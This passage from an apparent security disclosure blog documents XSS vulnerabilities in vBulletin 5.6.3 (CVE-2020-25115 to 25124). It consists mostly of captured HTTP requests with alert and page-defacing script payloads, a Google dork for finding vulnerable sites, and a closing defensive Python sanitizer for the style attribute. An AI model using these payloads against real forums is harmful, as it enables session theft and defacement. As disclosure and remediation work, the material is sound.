Cookie: PHPSESSID=66bb49d8a0a0c85337e9f1ff2f477dd2c4c3278731f15b63; BIGipServervbdemo-web_POOL=1459677194.20480.0000; vb41544sessionhash=cabb7c438fad791fd753dd4ac0d63d9c; vb41544lastvisit=1599040629; vb41544lastactivity=1599046274; vb41544np_notices_displayed=; vb41544cpsession=9795d7b732a28c69b2b7cf6b45e633fd
Upgrade-Insecure-Requests: 1
s=cabb7c438fad791fd753dd4ac0d63d9c&do=updatestyle&adminhash=bcb0ead2d82b59b30a0fbbf87a2481ec&securitytoken=1599053871-12cb4d6d0b4ccdeb8b01deda904b721ccec94070&title=Wood""><script>alert("Style vulnerable to xss")</script>&userselect=0&displayorder=1&dostyleid=35&oldparentid=34&parentid=34
POST: HTTP/1.1 200 OK
Date: Wed, 02 Sep 2020 13:37:55 GMT
X-Frame-Options: sameorigin
Content-Security-Policy: frame-ancestors 'self'
Expires: 0
Cache-Control: private, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Connection: keep-alive, Keep-Alive
Keep-Alive: timeout=2, max=100
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
---------------------

5.

Go to the "User Manual" (Help). Choose "Login / Logoff" and click "Add Child Help Item", put XSS code in the "Title" and save this.

Picture:

6.

XSS in admincp/search.php?do=dosearch
 
 
https://000ffdcb4b54-041552.demo.vbulletin.net/admincp/search.php?do=dosearch
Host: 000ffdcb4b54-041552.demo.vbulletin.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------196800503716438528872935002711
Content-Length: 888
Origin: https://000ffdcb4b54-041552.demo.vbulletin.net
Connection: keep-alive
Referer: https://000ffdcb4b54-041552.demo.vbulletin.net/admincp/index.php?do=head
Cookie: vb41552sessionhash=8a56db8d216a264c521075efcdec6fbc; vb41552lastvisit=1599073512; vb41552lastactivity=1599073533; PHPSESSID=14c8d2f95e38243fe5111ce9579ad09bf617569f7680008d; BIGipServervbdemo-web_POOL=1459677194.20480.0000; vb41552np_notices_displayed=; vb41552cpsession=23a8f609c662a079aaee64e50f270b24; vb41552password=59098efc90d7f0a3412b019b3cddacffd1570b654367f3bd46d363d0; vb41552userid=2; vb41552sitebuilder_active=1; vb41552userstyleid=23
Upgrade-Insecure-Requests: 1
s=8a56db8d216a264c521075efcdec6fbc&do=dosearch&adminhash=9fd383657a5b776e14cd2f6fc4479618&securitytoken=1599073565-4349b68a14d2331f6e68ec0f182e805f22267460&terms=""><script>alert("xss")</script><script>alert(document.cookie)</script><marquee>Html code injection</marquee><svg/onload=alert("Slash")></svg>
POST: HTTP/1.1 200 OK
Date: Wed, 02 Sep 2020 19:09:56 GMT
X-Frame-Options: sameorigin
Content-Security-Policy: frame-ancestors 'self'
Expires: 0
Cache-Control: private, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Connection: keep-alive, Keep-Alive
Keep-Alive: timeout=2, max=100
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
---------------------

7.

"vBulletin Options" - "Setting Group" - "Paid Subscriptions" - the field "Paid Subscription Email Notification" is vulnerable to XSS.

Picture:

https://imgur.com/a/rmbKPaD

https://000ffdcb4b54-041552.demo.vbulletin.net/admincp/options.php?do=options&dogroup=paidsubs&advanced=0

8. "User Rank Manager" is vulnerable to XSS.

https://000ffdcb4b54-041552.demo.vbulletin.net/admincp/ranks.php?do=modify

Click on "Rank Type" and put XSS code in the field "Or if you have a URL enter that".

Picture:

https://imgur.com/a/bZigbbi

 

CVE-2020-25115
CVE-2020-25116
CVE-2020-25117
CVE-2020-25118
CVE-2020-25119
CVE-2020-25120
CVE-2020-25121
CVE-2020-25122
CVE-2020-25123
CVE-2020-25124

And all the old bugs in the old version 5.6.2 also work in the new 5.6.3.


 



Tuesday, September 1, 2020

vBulletin 5.6.3 Persistent XSS Image Properties

 

This is a problem in CKEditor. And it works not only in vBulletin and not only with the administrator.


# Exploit Title: vBulletin 5.6.3 Persistent XSS Image Properties 
# Date: 01.09.2020
# Author: Vincent666 ibn Winnie
# Software Link: https://www.vbulletin.com/en/vb5-trial/
# Tested on: Windows 10
# Web Browser: Mozilla Firefox,Opera.
# Blog : https://pentest-vincent.blogspot.com/
# PoC: https://pentest-vincent.blogspot.com/2020/09/exploit-title-vbulletin-5.html
# Google Dorks: "Powered by vBulletin® Version 5.6.3"


Click "Image Properties" in the PM chat or a topic on the forum and we can see that the field "Style" is vulnerable to cross-site scripting.

Put XSS code in the field and click "Post Reply". And we have a persistent XSS. The XSS attack can be used only by the administrator. He will not do this.

Can a user do this? Yes. If the administrator changes the settings.

Settings to change for tests:

Admin CP - Channel Permissions Manager - Edit Registered Users - Can Use HTML - Yes.

And we can see the warning: "Security Risk: Enabling HTML for untrusted users can expose your site to security risks and exploitation".

We found a vulnerable field and tested how it works if we change the security settings. But there may be (?) other ways to exploit this bug.

Example page with persistent XSS:

https://8289cfe4157f-041544.demo.vbulletin.net/forum/main-forum/82-hello

XSS code (I like a big code ;)):

""><style>body{visibility:hidden;} html{background-color: Black;}</style><div style="position: absolute;left: 420px;top: 40px;%E2%80%8B%E2%80%8Bz-index: 10;visibility: visible; color: Green; font-size: 40px;"><script>alert("Persistent XSS")</script><script>alert("vBulletin 5.6.3")</script><script>alert("by XSS Maker Vincent ibn Winnie")</script><img src="https://i.gifer.com/Ltvw.gif " style="height: 300px; width: 400px;" alt=".."><br>Cross site scripting is here..;)<br></img><iframe>



https://8289cfe4157f-041544.demo.vbulletin.net/create-content/text/
Host: 8289cfe4157f-041544.demo.vbulletin.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 1855
Origin: https://8289cfe4157f-041544.demo.vbulletin.net
Connection: keep-alive
Referer: https://8289cfe4157f-041544.demo.vbulletin.net/new-content/3
Cookie: PHPSESSID=b1e7fccc193576322852e188279e3c09dbb2c5ca3aa27902; BIGipServervbdemo-web_POOL=1459677194.20480.0000; vb41544sessionhash=837ae139e93de6766093e52cb929818d; vb41544lastvisit=1598971031; vb41544lastactivity=1598971042; vb41544np_notices_displayed=
securitytoken=1598971115-633179a0af862c995f9f9761092aa508c4a44151&iconid=0&title=test1&text=test test test <img alt="efre" class="bbcode-attachment" data-align="none" data-debug="debug__godzilla" data-linktarget="0" data-linktype="0" data-linkurl="" data-size="full" data-tempid="temp_51_1598971305231_517" src="filedata/fetch?filedataid=51&amp;type=full" style="&quot;&quot;&gt;&lt;style&gt;body{visibility:hidden;} html{background-color: Black;}&lt;/style&gt;&lt;div style=&quot;position: absolute;left: 420px;top: 40px;%E2%80%8B%E2%80%8Bz-index: 10;visibility: visible; color: Green; font-size: 40px;&quot;&gt;&lt;script&gt;alert(&quot;Stored XSS&quot;)&lt;/script&gt;&lt;script&gt;alert(&quot;vBulletin 5.6.3&quot;)&lt;/script&gt;&lt;script&gt;alert(&quot;by XSS Maker Vincent ibn Winnie&quot;)&lt;/script&gt;&lt;img src=&quot;https://i.gifer.com/Ltvw.gif &quot; style=&quot;height: 300px; width: 400px;&quot; alt=&quot;..&quot;&gt;&lt;br&gt;Stored XSS&lt;br&gt;&lt;/img&gt;&lt;iframe&gt;" title="grfr" />&files=&filedataids[temp_51_1598971305231_517]=51&filenames[temp_51_1598971305231_517]=xssed_logo.gif&uploadFrom=newContent,newContent&file=,&polloptions[new][]=,,&timeout=&eventstartdate=09/01/2020&is_all_day=1&eventenddate=09/01/2020&ignoredst=1&location=&autocompleteHelper=&tags=,&htmlstate=off&parentid=3&ret=https://8289cfe4157f-041544.demo.vbulletin.net/forum/main-forum
POST: HTTP/1.1 200 OK
Date: Tue, 01 Sep 2020 14:41:49 GMT
X-Frame-Options: sameorigin
Content-Security-Policy: frame-ancestors 'self'
Cache-Control: max-age=0,no-cache,no-store,post-check=0,pre-check=0
Expires: Sat, 1 Jan 2000 01:00:00 GMT
Last-Modified: Tue, 01 Sep 2020 14:41:49 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Connection: keep-alive, Keep-Alive
Content-Length: 112
Keep-Alive: timeout=2, max=100
Content-Type: application/json; charset=UTF-8
---------------------
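The captured request above shows exactly why the "Style" field works: the value is written straight into style="..." on the img tag, and the leading quote in the payload closes the attribute, so the rest is parsed as new markup. A field like this needs two things on the server, not one: the value has to be rebuilt from a short list of CSS properties with a strict grammar per value, and whatever survives has to be attribute-encoded when rendered. The code below is an added example written for this page; it is not CKEditor or vBulletin code, and the property list, the value grammars, the length limit and the constructed breakout string are assumptions.

```python
"""Allow-list policy for a user-controlled style attribute (image "Style" field).

Added example for this post, not CKEditor or vBulletin code. The stored payload
above works because the editor writes the field value straight into
style="..." and a quote in the value closes the attribute. Two things stop it:
rebuild the value from known CSS properties with strict value grammars, and
attribute-encode whatever survives when rendering.
"""
import re
from html import escape

# Properties an image style may set (assumed list), each with the only value shape accepted.
ALLOWED_PROPERTIES = {
    "width":  re.compile(r"\d{1,4}(px|%)"),
    "height": re.compile(r"\d{1,4}(px|%)"),
    "float":  re.compile(r"left|right|none"),
    "margin": re.compile(r"(\d{1,3}px|auto)( (\d{1,3}px|auto)){0,3}"),
    "border": re.compile(r"\d{1,2}px (solid|dashed|dotted|none)( #[0-9a-fA-F]{3,6})?"),
}


def sanitize_style(value: str, max_len: int = 200):
    """Return (clean_value, rejected_declarations).

    Any declaration whose property is unknown or whose value does not fully
    match its grammar is dropped, so quotes, angle brackets, url(...) and
    expression(...) can never reach the attribute.
    """
    if len(value) > max_len:
        return "", [f"value too long ({len(value)} chars)"]
    kept, rejected = [], []
    for decl in value.split(";"):
        decl = decl.strip()
        if not decl:
            continue
        if ":" not in decl:
            rejected.append(decl)
            continue
        prop, val = decl.split(":", 1)
        prop = prop.strip().lower()
        val = " ".join(val.split())          # collapse whitespace before matching
        pattern = ALLOWED_PROPERTIES.get(prop)
        if pattern is None or not pattern.fullmatch(val):
            rejected.append(decl)
            continue
        kept.append(f"{prop}: {val}")
    return "; ".join(kept), rejected


def render_img(src: str, style: str) -> str:
    """Emit the <img> tag with both attributes HTML-attribute-encoded.

    `src` is assumed to have been scheme-checked upstream; this function only
    shows the output-encoding step for the style value.
    """
    clean, _ = sanitize_style(style)
    attrs = f' src="{escape(src, quote=True)}"'
    if clean:
        attrs += f' style="{escape(clean, quote=True)}"'
    return f"<img{attrs}>"


# Constructed inputs: a legitimate value and a breakout modelled on the payload above.
GOOD_STYLE = "height: 300px; width: 400px;"
BREAKOUT = ('""><style>body{visibility:hidden;}</style>'
            '<div style="position: absolute"><script>alert(1)</script>')

if __name__ == "__main__":
    print(sanitize_style(GOOD_STYLE))   # ('height: 300px; width: 400px', [])
    print(sanitize_style(BREAKOUT)[0])  # '' (every declaration rejected)
    print(render_img("https://example.com/a.gif", BREAKOUT))  # <img src="https://example.com/a.gif">
```

The order matters: the grammar check decides what is allowed, and the encoding step guarantees that even an allowed value can never end the attribute. Relying on the editor's own UI for either, as the "Can Use HTML" warning in this post implies, leaves both to the client.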
